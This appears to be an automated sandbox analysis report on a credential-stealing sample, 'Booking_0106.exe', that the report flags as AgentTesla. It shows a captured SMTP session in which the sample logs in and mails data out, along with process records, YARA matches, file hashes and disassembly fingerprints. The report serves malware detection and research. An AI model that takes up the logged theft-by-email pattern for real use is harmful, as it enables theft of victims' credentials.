Oct 6, 2024 10:41:21.395107031 CEST	587	49735	162.254.34.31	192.168.2.4	235 2.7.0 Authentication successful
Oct 6, 2024 10:41:21.395365953 CEST	49735	587	192.168.2.4	162.254.34.31	MAIL FROM:<sendxambro@educt.shop>
Oct 6, 2024 10:41:21.558557987 CEST	587	49735	162.254.34.31	192.168.2.4	250 2.1.0 Ok
Oct 6, 2024 10:41:21.558716059 CEST	49735	587	192.168.2.4	162.254.34.31	RCPT TO:<ambro@educt.shop>
Oct 6, 2024 10:41:21.722807884 CEST	587	49735	162.254.34.31	192.168.2.4	250 2.1.5 Ok
Oct 6, 2024 10:41:21.723124027 CEST	49735	587	192.168.2.4	162.254.34.31	DATA
Oct 6, 2024 10:41:21.883572102 CEST	587	49735	162.254.34.31	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Oct 6, 2024 10:41:21.884305000 CEST	49735	587	192.168.2.4	162.254.34.31	.
Oct 6, 2024 10:41:22.154721975 CEST	587	49735	162.254.34.31	192.168.2.4	250 2.0.0 Ok: queued as 9E62360DB6
Oct 6, 2024 10:41:29.104602098 CEST	587	49744	162.254.34.31	192.168.2.4	220 server1.educt.shop127.0.0.1 ESMTP Postfix
Oct 6, 2024 10:41:29.105488062 CEST	49744	587	192.168.2.4	162.254.34.31	EHLO 549163
Oct 6, 2024 10:41:29.280472040 CEST	587	49744	162.254.34.31	192.168.2.4	250-server1.educt.shop127.0.0.1 250-PIPELINING 250-SIZE 204800000 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Oct 6, 2024 10:41:29.280780077 CEST	49744	587	192.168.2.4	162.254.34.31	AUTH login c2VuZHhhbWJyb0BlZHVjdC5zaG9w
Oct 6, 2024 10:41:29.442126036 CEST	587	49744	162.254.34.31	192.168.2.4	334 UGFzc3dvcmQ6
Oct 6, 2024 10:41:29.611310959 CEST	587	49744	162.254.34.31	192.168.2.4	235 2.7.0 Authentication successful
Oct 6, 2024 10:41:29.611500025 CEST	49744	587	192.168.2.4	162.254.34.31	MAIL FROM:<sendxambro@educt.shop>
Oct 6, 2024 10:41:29.775531054 CEST	587	49744	162.254.34.31	192.168.2.4	250 2.1.0 Ok
Oct 6, 2024 10:41:29.775758028 CEST	49744	587	192.168.2.4	162.254.34.31	RCPT TO:<ambro@educt.shop>
Oct 6, 2024 10:41:29.940088034 CEST	587	49744	162.254.34.31	192.168.2.4	250 2.1.5 Ok
Oct 6, 2024 10:41:29.940234900 CEST	49744	587	192.168.2.4	162.254.34.31	DATA
Oct 6, 2024 10:41:30.309226036 CEST	587	49744	162.254.34.31	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Oct 6, 2024 10:41:30.310112000 CEST	49744	587	192.168.2.4	162.254.34.31	.
Oct 6, 2024 10:41:30.310405970 CEST	587	49744	162.254.34.31	192.168.2.4	354 End data with <CR><LF>.<CR><LF>
Oct 6, 2024 10:41:30.581976891 CEST	587	49744	162.254.34.31	192.168.2.4	250 2.0.0 Ok: queued as D2F8460DB6
Oct 6, 2024 10:42:47.594800949 CEST	49733	587	192.168.2.4	162.254.34.31	QUIT
Oct 6, 2024 10:42:47.757987976 CEST	587	49733	162.254.34.31	192.168.2.4	221 2.0.0 Bye
Oct 6, 2024 10:43:00.345022917 CEST	49735	587	192.168.2.4	162.254.34.31	QUIT
Oct 6, 2024 10:43:00.505306005 CEST	587	49735	162.254.34.31	192.168.2.4	221 2.0.0 Bye
Oct 6, 2024 10:43:08.454293013 CEST	49744	587	192.168.2.4	162.254.34.31	QUIT
Oct 6, 2024 10:43:08.616071939 CEST	587	49744	162.254.34.31	192.168.2.4	221 2.0.0 Bye

Target ID:	0
Start time:	04:41:03
Start date:	06/10/2024
Path:	C:\Users\user\Desktop\Booking_0106.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Booking_0106.exe"
Imagebase:	0xb00000
File size:	2'002'368 bytes
MD5 hash:	219BC0B3320F5F73D684F07800C0134D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1731841032.0000000005960000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1729847882.0000000003FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1711502008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1711502008.0000000003117000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	04:41:04
Start date:	06/10/2024
Path:	C:\Users\user\AppData\Local\Temp\doc-d.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\doc-d.exe"
Imagebase:	0x310000
File size:	15'872 bytes
MD5 hash:	C9EF77CA68F77B6C1267A7314203C94B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:41:04
Start date:	06/10/2024
Path:	C:\Users\user\Desktop\Booking_0106.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Booking_0106.exe"
Imagebase:	0xb50000
File size:	2'002'368 bytes
MD5 hash:	219BC0B3320F5F73D684F07800C0134D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2962867895.0000000003117000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2962867895.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2962867895.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2962867895.000000000312A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	04:41:16
Start date:	06/10/2024
Path:	C:\Users\user\AppData\Roaming\ibrzb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ibrzb.exe"
Imagebase:	0x720000
File size:	2'002'368 bytes
MD5 hash:	219BC0B3320F5F73D684F07800C0134D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1860595273.0000000003CC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1842814784.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1842814784.0000000002D12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs Detection: 67%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:41:17
Start date:	06/10/2024
Path:	C:\Users\user\AppData\Roaming\ibrzb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ibrzb.exe"
Imagebase:	0x2c0000
File size:	2'002'368 bytes
MD5 hash:	219BC0B3320F5F73D684F07800C0134D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2963837882.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2963837882.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2963837882.0000000002981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2963837882.00000000029BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	04:41:24
Start date:	06/10/2024
Path:	C:\Users\user\AppData\Roaming\ibrzb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ibrzb.exe"
Imagebase:	0x440000
File size:	2'002'368 bytes
MD5 hash:	219BC0B3320F5F73D684F07800C0134D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1926073695.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1939658739.0000000003A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1926073695.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	04:41:26
Start date:	06/10/2024
Path:	C:\Users\user\AppData\Roaming\ibrzb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\ibrzb.exe"
Imagebase:	0xb10000
File size:	2'002'368 bytes
MD5 hash:	219BC0B3320F5F73D684F07800C0134D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2962339297.000000000306C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2962339297.0000000003074000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2962339297.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2962339297.0000000003041000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2962339297.000000000307A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	04:41:47
Start date:	06/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7588 -s 1736
Imagebase:	0x8e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	98.5%
Signature Coverage:	17.1%
Total number of Nodes:	205
Total number of Limit Nodes:	13

Executed Functions

Function 059E2134 Relevance: 14.9, Strings: 11, Instructions: 1171COMMON

Download Yara Rule

Strings

$^q, xrefs: 059E2A11
,bq, xrefs: 059E2BFA
$^q, xrefs: 059E2647
$^q, xrefs: 059E2597
$^q, xrefs: 059E23C3
$^q, xrefs: 059E2637
$^q, xrefs: 059E2587
$^q, xrefs: 059E2A21
$^q, xrefs: 059E23D3
$^q, xrefs: 059E2A7A
$^q, xrefs: 059E2A6A

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: ,bq$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-755311264
Opcode ID: b8a53f9b385257e120b50f8fb460231083d35746c1a2f0dab8c56b6fa0716acb
Instruction ID: bc9deb784267967414a3ebae1ae1bd88d1f0faf4b4022083c9a645c31b680177
Opcode Fuzzy Hash: b8a53f9b385257e120b50f8fb460231083d35746c1a2f0dab8c56b6fa0716acb
Instruction Fuzzy Hash: 40B21738A002189FDB15DFA4C994FADB7BABF48700F148599E506AB3A5CB71EC85CF50

Function 059E2467 Relevance: 6.7, Strings: 5, Instructions: 495COMMON

Download Yara Rule

Strings

,bq, xrefs: 059E2BFA
$^q, xrefs: 059E2A11
$^q, xrefs: 059E2637
$^q, xrefs: 059E2587
$^q, xrefs: 059E2A6A

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: ,bq$$^q$$^q$$^q$$^q
API String ID: 0-4182863657
Opcode ID: b0826211cb451b4b3b0055a210fda2892282b36b638bf2b0287e39eaaf50e0cd
Instruction ID: 319fd1e197128c5f20aaccf39f3a3c4000405a60d50fbb203010e6281d7f6bdf
Opcode Fuzzy Hash: b0826211cb451b4b3b0055a210fda2892282b36b638bf2b0287e39eaaf50e0cd
Instruction Fuzzy Hash: 46220A34A00219DFDF25DFA4C994BADB7BAFF48300F1485A9E509AB2A5DB319D81CF50

Function 01437C08 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 0143832B
TJcq, xrefs: 01437DAA
xbaq, xrefs: 01437D35
pbq, xrefs: 014387C2

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$pbq$xbaq
API String ID: 0-1954897716
Opcode ID: f732b1caeac94aa8c407dd43ff56302e33f1cd76d2dc740392a363d564d075bf
Instruction ID: 0e6aa67647c070bf392af7576d6ba90be34697d5182a1020b56a83c2d4bcc985
Opcode Fuzzy Hash: f732b1caeac94aa8c407dd43ff56302e33f1cd76d2dc740392a363d564d075bf
Instruction Fuzzy Hash: 3CA2C775E00228CFDB55CF69C984A99BBB2FF89304F1581E9E509AB365DB319E81CF40

Function 057B0048 Relevance: 4.5, Strings: 2, Instructions: 1964COMMON

Download Yara Rule

Strings

4'^q, xrefs: 057B1549
4'^q, xrefs: 057B1559

Memory Dump Source

Source File: 00000000.00000002.1731175276.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57b0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 6cbb1455007f67853d34ad50b7095c943b79d1a2b88ad11ff01c88fc9df68aa1
Instruction ID: 4de909987c325d6d12e4a093ebd128ffbd26ed0faec2f78bb79baa018188f756
Opcode Fuzzy Hash: 6cbb1455007f67853d34ad50b7095c943b79d1a2b88ad11ff01c88fc9df68aa1
Instruction Fuzzy Hash: 0CF2B570909389DFEB16CBB4DC5CBEE7FB5BF06300F14849AE141AB2A2C6B45845DB61

Function 01430E88 Relevance: 3.1, Strings: 2, Instructions: 588
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\s^q, xrefs: 01431145
LR^q, xrefs: 01430F60

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 0284602488c777e8a229e08aab06966df507cac6145c458558339a3fc0ef62fa
Instruction ID: 72663088cdbd238028f7e8dc530bc3323195a2834db8f507da3b258b26d4f0e2
Opcode Fuzzy Hash: 0284602488c777e8a229e08aab06966df507cac6145c458558339a3fc0ef62fa
Instruction Fuzzy Hash: 6E326C75A012198FDB24CF79D894AAEB7F2BFC8300F15866AD40AEB355DB309941CF91

Function 05A3C748 Relevance: 3.0, Strings: 2, Instructions: 542
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 05A3C867
8, xrefs: 05A3C854

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID: fcq$8
API String ID: 0-89531850
Opcode ID: 34484beecdd2891af4f93387c85c5a93b41a340722314c0d847592b760ea7874
Instruction ID: e23dc5c548becb2662d11268b53f453a2a661eb9a96b8e3379cd99881a809308
Opcode Fuzzy Hash: 34484beecdd2891af4f93387c85c5a93b41a340722314c0d847592b760ea7874
Instruction Fuzzy Hash: 3642C275D00629CBDB64CF69C850AD9B7B2BF89314F1486EAD40DB7250EB30AE85CF80

Function 01430E78 Relevance: 2.9, Strings: 2, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\s^q, xrefs: 01431145
LR^q, xrefs: 01430F60

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: ec28dd9036a21b5dece2d85546e3f47f49c0eca25c2823b17840b3648fadd3f0
Instruction ID: ddd04347b3adf4bc67409a5f3c5c8ed4a0894a9120883df995dad03e3f7a5e50
Opcode Fuzzy Hash: ec28dd9036a21b5dece2d85546e3f47f49c0eca25c2823b17840b3648fadd3f0
Instruction Fuzzy Hash: 69E18175E112298FDB24CF79D844AAEB7F2BFC8304F118669D40AEB354DB709942CB90

Function 01430EC2 Relevance: 2.9, Strings: 2, Instructions: 361
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\s^q, xrefs: 01431145
LR^q, xrefs: 01430F60

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: 9abb810b493e62a09a8128aafd32d92cd5ddfb0d2247e38b9cd9d7d26a68cdfa
Instruction ID: 37924010ec901a7e311189d2a716609e46dbf8a7b59fc68a952a5e1b9689b252
Opcode Fuzzy Hash: 9abb810b493e62a09a8128aafd32d92cd5ddfb0d2247e38b9cd9d7d26a68cdfa
Instruction Fuzzy Hash: EBE17F75E111298FDB14CF79D844AAEB7F2BFC8304F11866AD40AEB358DB709942CB90

Function 01430F39 Relevance: 2.8, Strings: 2, Instructions: 333
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\s^q, xrefs: 01431145
LR^q, xrefs: 01430F60

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: LR^q$\s^q
API String ID: 0-2586804783
Opcode ID: a26c1564ca0a588c3820f5028b6d861f3d95d7ec7bb9fa338f035a7a078a0d64
Instruction ID: 2c9fc7a3327eee139ff2517b494af14934b5fca90a5f10ba1baa465cfc20c3d6
Opcode Fuzzy Hash: a26c1564ca0a588c3820f5028b6d861f3d95d7ec7bb9fa338f035a7a078a0d64
Instruction Fuzzy Hash: 4CD16D75E111298FDB14CF7AD844AAEB7F2BFC8704F118629D406EB358DB70A942CB90

Function 014335AA Relevance: 2.7, Strings: 2, Instructions: 168COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0143366F
4'^q, xrefs: 0143369A

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 46237c964328b636abac12d541fc3b580068cd0793fc6b4770a4c0bfe909c930
Instruction ID: 1202741819685b45b3b2a541f0c1f46fc08cd34d628d53288916e247c8ff30d4
Opcode Fuzzy Hash: 46237c964328b636abac12d541fc3b580068cd0793fc6b4770a4c0bfe909c930
Instruction Fuzzy Hash: 2271E974A112098FD758DF7AE99869ABBF3BBD8300F14C52AD1089B26DDB3058068F51

Function 014335B8 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0143366F
4'^q, xrefs: 0143369A

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 92fc8071282e90367b9b4ff7e9a80d6efc95e34cce07c9e3c41c6244c4fa458a
Instruction ID: 93f9601ff2cae1dcaca085c8ff0b724ad467b776ebb0acade4c7d143e769b15e
Opcode Fuzzy Hash: 92fc8071282e90367b9b4ff7e9a80d6efc95e34cce07c9e3c41c6244c4fa458a
Instruction Fuzzy Hash: A871E974E012098FD758EF7AE99869ABBF3BBD8300F14C52AD1089B26DDF3058068F51

Function 05A3C73A Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

h, xrefs: 05A3C848
fcq, xrefs: 05A3C867

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: 15da16e5deb98c7992d23d357ae08c4c6dc9cd24d319f0e78456ddcfc9f5cffe
Instruction ID: fb5f5aae9bf3dd19a22e8247af590406cdae8b2841c3e093478cf44140569998
Opcode Fuzzy Hash: 15da16e5deb98c7992d23d357ae08c4c6dc9cd24d319f0e78456ddcfc9f5cffe
Instruction Fuzzy Hash: 4461E371D006298BDB64CF6ACC54BD9BBB2BF89314F14C2AAD40DB7254EB305A85CF90

Function 057B0001 Relevance: 2.6, Strings: 1, Instructions: 1387COMMON

Download Yara Rule

Strings

4'^q, xrefs: 057B1549

Memory Dump Source

Source File: 00000000.00000002.1731175276.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57b0000_Booking_0106.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 1a2d1c693e7403861b59be98247e9f48cd0e86b24f01e454a984bbea29d848ca
Instruction ID: 29c4d892305bbdd895a79b3bdfbcb7743043031b87fe0605df52eb84873b755b
Opcode Fuzzy Hash: 1a2d1c693e7403861b59be98247e9f48cd0e86b24f01e454a984bbea29d848ca
Instruction Fuzzy Hash: 61B25A7051E384AFEB1787789C6DB9A3F74AF03304F1985DAE140DB1E3C6A85849DB62

Function 0143A2A2 Relevance: 2.3, Strings: 1, Instructions: 1093COMMON

Download Yara Rule

Strings

2, xrefs: 0143ADF0

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 35191135a81b21234b40f6859dc713f6af58f6f01289dba8339a7644deea1cd4
Instruction ID: 7570d76e9497d67e27b4b8d74213dca48cacb916bd174bc7e1583313cfbf1f36
Opcode Fuzzy Hash: 35191135a81b21234b40f6859dc713f6af58f6f01289dba8339a7644deea1cd4
Instruction Fuzzy Hash: 7BC2C474E412298FCB65DF69C984B99BBB6FF88300F1081EAD509A7365DB309E85CF41

Function 014317A8 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

LR^q, xrefs: 01431B40

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 16227790144cda2156fa7a5338b3aa05212dd007970f549d8866b1ce676ca805
Instruction ID: 7f363a368e0ec5c4eeb48fda38251c124b8d2a5209f68fe7a07029421ad38a95
Opcode Fuzzy Hash: 16227790144cda2156fa7a5338b3aa05212dd007970f549d8866b1ce676ca805
Instruction Fuzzy Hash: 5EF16131E011298FDB14DF69C894AADBBF3BF88301F19C5AAD459AB296C7349D81CF50

Function 059FF140 Relevance: 1.6, Strings: 1, Instructions: 360COMMON

Download Yara Rule

Strings

Te^q, xrefs: 059FF3F8

Memory Dump Source

Source File: 00000000.00000002.1732067452.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59f0000_Booking_0106.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: e15ba7f069aa31d3fce71216ec5c651d515472c5548c92549256cab01ed893c6
Instruction ID: 8a087f55e34731308f7e71fbacf94d0ba7f9fe808089bfd307df8de319e87377
Opcode Fuzzy Hash: e15ba7f069aa31d3fce71216ec5c651d515472c5548c92549256cab01ed893c6
Instruction Fuzzy Hash: C3F11374E05218CFEB64CF69D998BADBBF2BB89304F1085AAD60DA7254DB705D84CF00

Function 05A3F510 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05A3F5C5

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f1873a16173618e05eb653428bc5a6b84abcd96e7e94aa0c7f004e467a169456
Instruction ID: b8798d41d7b14858380c9f3782e52b0ed874cca397ab5add1529748b2de634f5
Opcode Fuzzy Hash: f1873a16173618e05eb653428bc5a6b84abcd96e7e94aa0c7f004e467a169456
Instruction Fuzzy Hash: 804177B5D042589FCF10CFAAD981ADEFBB1BB49314F10942AE819B7310D735A945CF68

Function 05A3F50A Relevance: 1.6, APIs: 1, Instructions: 104nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05A3F5C5

Memory Dump Source

Source File: 00000000.00000002.1732236350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5a30000_Booking_0106.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
